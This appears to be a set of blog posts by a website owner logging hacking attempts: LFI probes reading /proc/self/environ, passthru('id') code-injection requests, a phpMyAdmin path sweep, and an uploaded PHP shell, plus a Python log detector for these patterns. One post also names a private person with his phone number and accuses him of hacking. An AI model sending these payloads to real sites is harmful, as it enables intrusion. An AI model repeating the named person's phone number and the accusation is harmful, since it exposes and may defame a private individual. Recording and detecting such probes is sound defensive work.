58.63.241.209 knocking on the door.

I see a few visitors who are looking for weaknesses on most of my domains daily.
Usually a few lines like “admin/banner_manager.php/login.php” within a few seconds.
This one was a bit more “intense” than usual: over 1100 lines in the log, and it lasted for over 13 minutes.
It came from the IP 58.63.241.209 (China), looking for weaknesses to exploit (“proc/self/environ%00”).

I see Joomla clearly in there, but whether the rest of the hits are all related to Joomla, I don’t know.
I suspect this is an intended “box opener” looking for weaknesses in various possible installs, but I have very limited knowledge of this.

58.63.241.209 is known from before, see e.g. http://www.dshield.org/ipdetails.html?ip=58.63.241.209

The first few lines are below; see the attached .txt-file (.txt is now allowed?) / .odt-file if you are interested in the rest.

[29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:48 -0500] "GET /images/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:49 -0500] "GET /album/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /img/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /albums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:52 -0500] "GET /photo/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photos/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbum/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /photoalbums/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:53 -0500] "GET /pic/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27;
[29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:54 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /include/new-visitor.inc.php?lvc_include_dir=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:55 -0500] "GET /_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:56 -0500] "GET /cpcommerce/_functions.php?prefix=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/coppermine/themes/default/theme.php?THEME_DIR=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /ashnews.php?pathtoashnews=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:57 -0500] "GET /eblog/blog.inc.php?xoopsConfig[xoops_url]=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /pm/lib.inc.php?pm_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /b2-tools/gm-2-b2.php?b2inc=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:58 -0500] "GET /modules/mod_mainmenu.php?mosConfig_absolute_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /modules/agendax/addevent.inc.php?agendax_path=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:06:59 -0500] "GET /includes/include_once.php?include_file=../../../../../../../proc/self/environ%00
[29/Dec/2011:04:07:00 -0500] "GET /e107/e107_handlers/secure_img_render.php?p=../../../../../../../proc/self/environ%00

58.0.0.0/7 was already in .htaccess.

Posted in hackers.

Gootkit auto-rooter scanner – hello

First time I have seen something identify itself as “Gootkit auto-rooter scanner”.
As a side note, this is also an example of why I prefer to block AfriNIC.
Too much rotten stuff coming from that space.

All these came via 41.129.63.65:

 [21/Sep/2011:09:28:13 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /PHPMYADMIN/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:14 -0400] "GET /db/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET /mysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:15 -0400] "GET / HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:16 -0400] "GET /3rdparty/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /3rdparty/setup.php HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /~/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /admin/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:17 -0400] "GET /administrator/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:18 -0400] "GET /administrator/PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /administrator/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:19 -0400] "GET /admin/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/sysadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /admin/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /bbs/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:20 -0400] "GET /cpadmindb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelmysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpanelsql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpdbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /cpphpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:21 -0400] "GET /database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/database/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:22 -0400] "GET /database/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/db-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/dbweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:23 -0400] "GET /db/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:24 -0400] "GET /db/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /db/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /~/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /MyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:25 -0400] "GET /mysql/admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqladminconfig/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/db/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/dbadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:26 -0400] "GET /mysql/mysqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/pMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /mysql/web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:27 -0400] "GET /~/phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /~/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmy/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /phpmya/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:28 -0400] "GET /php-my-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin1/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:29 -0400] "GET /phpMyAdmin-2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /phppma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /p/m/a/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /pma2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:30 -0400] "GET /PMA2005/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /program/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /qql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /roundcube/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /sl2/data/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:31 -0400] "GET /SQL/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sqlmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/phpmanager/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:32 -0400] "GET /sql/php-myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmy-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpmyadmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/phpMyAdmin2/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:33 -0400] "GET /sql/sql-admin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqladmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sqlweb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:34 -0400] "GET /sql/webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /sql/websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /typo3/phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /webdb/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:35 -0400] "GET /web/phpMyAdmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
 [21/Sep/2011:09:28:36 -0400] "GET /websql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
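Added example, not from the blog or from any tool the author used: a small Python detector that applies the probe patterns from both posts above (the /proc/self/environ%00 traversal and passthru() injection in the 58.63.241.209 hits, and the self-announcing User-Agent plus phpMyAdmin path sweep from 41.129.63.65) to Apache combined-format log lines. The sample lines are re-assembled from the excerpts on this page; the client-IP column, the status codes and sizes for the first post's lines, and the benign 192.0.2.10 entry are constructed.

```python
import re
from collections import defaultdict
from datetime import datetime
from urllib.parse import unquote

# Apache combined-format line; the author trimmed client-IP and UA fields in the excerpts above.
LOG_RE = re.compile(r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "\S+ (?P<path>\S+)[^"]*" '
                    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"$')
SCANNER_UAS = {"gootkit auto-rooter scanner"}                     # self-identifying scanners
ADMIN_PATH_RE = re.compile(r"phpmyadmin|pma|myadmin|sqladmin|dbadmin|mysql", re.I)
SHELL_FUNC_RE = re.compile(r"\b(passthru|system|shell_exec|exec|popen)\s*\(")

# Constructed sample: requests copied from the posts, client IP / status / size re-assembled.
SAMPLE_LOG = """\
58.63.241.209 - - [29/Dec/2011:04:06:48 -0500] "GET /pics/main.php?cmd=setquality&var1=1%27.passthru%28%27id%27%29.%27; HTTP/1.1" 404 512 "-" "-"
58.63.241.209 - - [29/Dec/2011:04:06:54 -0500] "GET /catalog/shopping_cart.php?_ID=../../../../../../../proc/self/environ%00 HTTP/1.1" 404 512 "-" "-"
41.129.63.65 - - [21/Sep/2011:09:28:14 -0400] "GET /phpmyadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
41.129.63.65 - - [21/Sep/2011:09:28:15 -0400] "GET /pma/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
41.129.63.65 - - [21/Sep/2011:09:28:15 -0400] "GET /myadmin/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
41.129.63.65 - - [21/Sep/2011:09:28:15 -0400] "GET /mysql/ HTTP/1.1" 403 603 "-" "Gootkit auto-rooter scanner"
192.0.2.10 - - [29/Dec/2011:04:10:00 -0500] "GET /index.php?q=node/63 HTTP/1.1" 200 4312 "-" "Mozilla/5.0"
"""

def parse(line):
    """One combined-format line -> dict (ip, ts, path, status, ua); None if it does not match."""
    m = LOG_RE.match(line.strip())
    return m and dict(m.groupdict(), ts=datetime.strptime(m["ts"], "%d/%b/%Y:%H:%M:%S %z"))

def classify(entry):
    """Tags for one request, from the probe patterns shown in the posts above."""
    decoded = unquote(entry["path"])      # %27 -> ', %28 -> (, %00 -> NUL byte
    tags = []
    if "../" in decoded and "/proc/self/environ" in decoded:
        tags.append("lfi-proc-environ")   # traversal into the process environment file
    if "\x00" in decoded:
        tags.append("null-byte")          # %00 used to truncate the included filename
    if SHELL_FUNC_RE.search(decoded):
        tags.append("php-code-injection") # passthru('id') and friends inside a parameter
    if entry["ua"].lower() in SCANNER_UAS:
        tags.append("scanner-ua")
    return tags

def scan(lines, admin_threshold=4, window_seconds=60):
    """Return {client_ip: sorted tags}. 'admin-path-sweep' is added when one client asks
    for >= admin_threshold distinct admin-panel paths within window_seconds."""
    findings, admin_hits = defaultdict(set), defaultdict(list)
    for e in filter(None, map(parse, lines)):
        findings[e["ip"]].update(classify(e))
        if ADMIN_PATH_RE.search(e["path"]):
            admin_hits[e["ip"]].append((e["ts"], e["path"].lower()))
    for ip, hits in admin_hits.items():
        hits.sort()
        for i, (t0, _) in enumerate(hits):  # window anchored at each hit in turn
            paths = {p for t, p in hits[i:] if (t - t0).total_seconds() <= window_seconds}
            if len(paths) >= admin_threshold:
                findings[ip].add("admin-path-sweep")
                break
    return {ip: sorted(t) for ip, t in findings.items() if t}
```

Feed it a real access log with `scan(open("access_log"))`; on a production log the admin_threshold should be raised, since a handful of distinct admin paths from one client can occur innocently.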
Posted in hackers.

Silent Noise hacked

And I don’t have much of a clue how it happened.
A shell (GNY.Shell – findex.php) and a proxy (proxy.php) were uploaded, but where the weakness was (is?) is not known to me.
I would not be very surprised if this turned out to be part of the Christmas hacking at evilzone.org.
In that respect it fits in with the previous posting here.

If you can read Norwegian, there is also something here:
hxxp://skriblerier. adesign. no/index.php?q=node/63 (not alive anymore, shut down in 2014)

User Agent:
Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; nb-NO; rv:1.9.1.6) Gecko/20091201 Firefox/3.5.6 (.NET CLR 3.5.30729)

I think I got mail set up right.
And the redirect to this one on wordpress.com.

Update some hours later

The shell that was uploaded:
http://www.virustotal.com/analisis/723df5a4fa11cf36f3998152707008a7c6e3978f2b82556f406b6874f39b925e-1261683007

Goes by various names: Backdoor.PHP.C99Shell.y, probably a variant of PHP/Rst.S, PHP.ShellBot.K, Trojan.Script.212277.

“Score” at virustotal is 16/41.

Update December 25, 2009

A few other interesting IPs:
62.16.238.118 <—–  “Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)”?
Umm, don’t think so. More likely a pimple-faced teenager from Trondheim in Norway. Seen on at least three of my domains.
Also using the UA string “Mozilla/5.0 (Windows; U; Windows NT 6.1; en-GB; rv:1.9.1.5) Gecko/20091102 Firefox/3.5.5”.

88.91.112.99 <—– Telenor in Norway. I have seen one very close one earlier, 88.91.112.130 (and 84.208.191.113, perhaps 85.165.173.203 too).
Now, how many Telenor users are skiddies? Quite a lot probably. But I’ll bet my money on that this is the one who used 88.91.112.130 to log in to h4cky0u as []Volume earlier this year. Now admin at evilzone.org and nationalhacker.org. If anyone is interested, they can check out how the Christmas hacking over at evilzone.org is going. I have not registered to have a look. But I trust that Andreas Ringstad Hansen, phone 470 42 073, is doing a good job in herding his “crew”.
Also admin at the former 1nj3ct.org. Which went down when he got a bit nervous after a little slap on the wrist from the police. nordicws.org is another one of his “masterpieces”. Oh, he changed that one. I can throw up a screenshot or two. Or five. When I figure out how to do it here on wordpress.com.
I’ll give it a try, it is supposed to be below this text:

screenshot from nordicws.org

68.68.107.40 <—-  Right now I have forgotten why this one is interesting.

195.47.247.176. Hits in logs at at least two of my domains. 195.47.247.176 is also hosting nordicws.org.
Lots of coincidences here.

Posted in hackers.

Not sure what to do with teenage hackers…

Not sure what to do with teenage hackers/skiddies or whatever I should call them.

I’ll figure it out someday.
Maybe.

Maybe on Monday. I’m already slowly getting in a bad mood.
Yes, maybe Monday.

Posted in General, hackers.